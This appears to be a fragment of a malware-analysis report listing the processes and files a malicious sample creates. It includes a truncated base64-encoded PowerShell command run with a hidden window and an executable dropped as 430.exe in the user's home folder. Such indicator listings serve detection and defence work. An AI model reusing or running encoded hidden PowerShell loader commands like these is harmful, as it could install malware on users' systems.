Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAHgAZgBjAGsAZQBpAGEAZAB2AGgAcwA9ACcASQBlAHYAcQBqAHAAeABvAG0AZABkACcAOwAkAEEAcABwAG0AZAByAGkAZwBqAHkAdgBzACAAPQAgACcANAAzADAAJwA7ACQAQQB5AHgAdwBmAG8AegBpAHAAbgBtAHQAPQAnAEwAdQBmAGwAZgBzAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 2012
- %TEMP%\1092584.cvr
- %HOMEPATH%\430.exe
- %HOMEPATH%\430.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAHgAZgBjAGsAZQBpAGEAZAB2AGgAcwA9ACcASQBlAHYAcQBqAHAAeABvAG0AZABkACcAOwAkAEEAcABwAG0AZAByAGkAZwBqAHkAdgBzACAAPQAgACcANAAzADAAJwA7ACQAQQB5AHgAdwBmAG8AegBpAHAAbgBtAHQAPQAnAEwAdQBmAGwAZgBzAH...' (with a hidden window)